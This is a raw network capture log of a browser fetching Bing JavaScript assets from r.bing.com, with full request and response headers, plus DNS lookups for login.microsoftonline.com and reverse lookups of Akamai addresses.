content-length: 245
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ItmcJflzfwBqUrBIYlGXpQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7fc3be6-701e-0015-5a3d-172809000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=384558
expires: Tue, 04 Feb 2025 08:53:06 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e778
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/lwQThTlaI10v50gbypuOTf2JDcM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C3014FD967
content-type: text/javascript; charset=utf-8
content-md5: 04jjFZu5YZ+50YtQ9rT+Jw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e5b340ed-501e-0046-5301-373406000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 4605
cache-control: public, no-transform, max-age=313746
expires: Mon, 03 Feb 2025 13:12:54 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e779
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/wJ4ypLxMemRfvxvJkUCpuYEBwew.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C3263B07E9
akamai-grn: 0.2b367a5c.1736154258.1312a5e0
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: 80z3xDtWBrHD/WXVZ9HXMQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1dc2465b-c01e-0007-0808-1b1c15000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 887
cache-control: public, no-transform, max-age=123723
expires: Sat, 01 Feb 2025 08:25:51 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e77a
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC617A7BA9F4
content-type: text/javascript; charset=utf-8
content-md5: 3LAdJkykvHw5zfSSu6AY7w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3cfa409d-001e-0011-1478-17dd8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 797
cache-control: public, no-transform, max-age=386345
expires: Tue, 04 Feb 2025 09:22:53 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e77b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/bzAVZoOHiaJeSbLoUcTPF4HPvJQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C305642E82
akamai-grn: 0.ad8f655f.1735248142.11a5b0dd
content-type: text/javascript; charset=utf-8
content-md5: o0P31pAM8ZjqucLAMWUkZQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19abbe20-e01e-0010-2301-37dc76000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1433
cache-control: public, no-transform, max-age=294403
expires: Mon, 03 Feb 2025 07:50:31 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e77c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/gfI083AUtzdZuPReAN6CvS-Ca98.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C3193D5444
content-type: text/javascript; charset=utf-8
content-md5: K6mYdssyGKO2Fe2fyESYTg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f577b309-d01e-0018-19fe-36c705000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 8536
cache-control: public, no-transform, max-age=317161
expires: Mon, 03 Feb 2025 14:09:49 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e77d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/k_DNa1TDg1SFhPx_XEzMve_fpFM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Vp50FK2RLAdVNy+Eb7RIpw==
last-modified: Tue, 14 Jan 2025 08:45:57 GMT
etag: 0x8DD3477DD52B87C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c7e5c364-901e-0050-42b1-66f598000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2897
cache-control: public, no-transform, max-age=181978
expires: Sun, 02 Feb 2025 00:36:46 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e77e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/ztUh7qME7I8WPjdMsB8y8tLZ8s4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD0492A397BB70
content-length: 1221
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: NQz+bEN0M74gpmwj/XRR0Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a707dcc0-e01e-005f-74dd-36186e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=157759
expires: Sat, 01 Feb 2025 17:53:07 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e77f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/4a2l6ts7ENpX5gGW0kp5U2iD6h8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCEC87DD067940
content-type: text/javascript; charset=utf-8
content-md5: hmcBay1BgAVA4sBe4FzXJg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e6406887-201e-0049-0cdd-36d9f0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 688
cache-control: public, no-transform, max-age=329789
expires: Mon, 03 Feb 2025 17:40:17 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e780
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC644F5E5FC5
content-length: 1076
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: oqLg+91b3FmpcS7e8iKMsQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 70e43bb9-e01e-0032-0c15-16b240000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=235411
expires: Sun, 02 Feb 2025 15:27:19 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e781
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/Sv8bO2oxkbGjZh6Pe_GKzG1DtDU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD1B4B9A365000
content-type: text/javascript; charset=utf-8
content-md5: p/3mO7vALd9wD5esEzLGZw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dc977b8f-f01e-0004-65b8-4d1f12000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 495
cache-control: public, no-transform, max-age=48066
expires: Fri, 31 Jan 2025 11:24:54 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e785
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/-2EVJNDwymhr08bVch00GwpjiDA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCEC85CF372642
content-length: 1043
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PkxdhPHrMXZXxfqaK/YI3w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6a67d116-b01e-0047-6073-1e35fb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.ad777b5c.1731317035.1926a730
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=357852
expires: Tue, 04 Feb 2025 01:28:00 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e786
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/lwgCOY8rCo0Ub0btSshwRlT9HWI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE82E33DB4289
content-length: 263
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: kSd0hTdqYlIKxD09mZrqMA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19451da4-501e-0046-6040-1a3406000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=189628
expires: Sun, 02 Feb 2025 02:44:16 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6ebc1
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/ulJ3ckR0YcGpvIX6xhO4prJhEQQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC67C959D1C6
content-length: 230
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: e8o72fCkQwkU95GMyH4alQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2daa6ae9-001e-0033-80b0-17b3bd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=132782
expires: Sat, 01 Feb 2025 10:56:50 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6ebc2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/ivu0QwP26BHIJjH_DSqboRdhsO0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD04929B4990FB
content-length: 3910
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PtU28jG6dGjHkVaL3KCYNw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d0661e89-601e-0001-5ebb-36eb6d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4c1a1202.1731612728.198d7eea
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=329848
expires: Mon, 03 Feb 2025 17:41:16 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6ec23
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/81LX7TP_DYNhvhaKa1MAKI2R73g.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: yaROttwcd6mi2Yh2jJ/VyQ==
last-modified: Tue, 28 Jan 2025 14:58:33 GMT
etag: 0x8DD3FAC3C97DA0D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2eefcee9-a01e-0035-4edc-7144c5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4eba1302.1738134110.2d6d11a5
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=264557
expires: Sun, 02 Feb 2025 23:33:06 GMT
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274629.f6ef73
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/l67XMHcHSezhrHeT6MUZN_k_RJw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: kLhZLspc3+wL9TqgQ8qHNA==
last-modified: Mon, 27 Jan 2025 15:22:26 GMT
etag: 0x8DD3EE6684A4E16
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0b641d5e-e01e-0032-2520-71b240000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4e8a4917.1738031533.ce60016
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=183596
expires: Sun, 02 Feb 2025 01:03:45 GMT
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274629.f6efbf
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/YelbEmIR9E54rYl4ZRg76rPKz3Q.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD0A4E57D80B90
content-length: 6764
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Xap81V4RtEj8TcfeaqPClA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9356dc7e-801e-0029-2885-3e9cd2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.bb777b5c.1732464550.c503632
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=276527
expires: Mon, 03 Feb 2025 02:52:40 GMT
date: Thu, 30 Jan 2025 22:03:53 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274633.f70ca8
timing-allow-origin: *
-
Remote address:8.8.8.8:53Requestlogin.microsoftonline.comIN AResponselogin.microsoftonline.comIN CNAMElogin.mso.msidentity.comlogin.mso.msidentity.comIN CNAMEak.privatelink.msidentity.comak.privatelink.msidentity.comIN CNAMEwww.tm.ak.prd.aadg.akadns.netwww.tm.ak.prd.aadg.akadns.netIN A20.190.160.14www.tm.ak.prd.aadg.akadns.netIN A20.190.160.128www.tm.ak.prd.aadg.akadns.netIN A20.190.160.66www.tm.ak.prd.aadg.akadns.netIN A40.126.32.68www.tm.ak.prd.aadg.akadns.netIN A20.190.160.20www.tm.ak.prd.aadg.akadns.netIN A40.126.32.140www.tm.ak.prd.aadg.akadns.netIN A40.126.32.72www.tm.ak.prd.aadg.akadns.netIN A40.126.32.74
-
Remote address:8.8.8.8:53Request1.135.221.88.in-addr.arpaIN PTRResponse1.135.221.88.in-addr.arpaIN PTRa88-221-135-1deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request48.135.221.88.in-addr.arpaIN PTRResponse48.135.221.88.in-addr.arpaIN PTRa88-221-135-48deploystaticakamaitechnologiescom
-
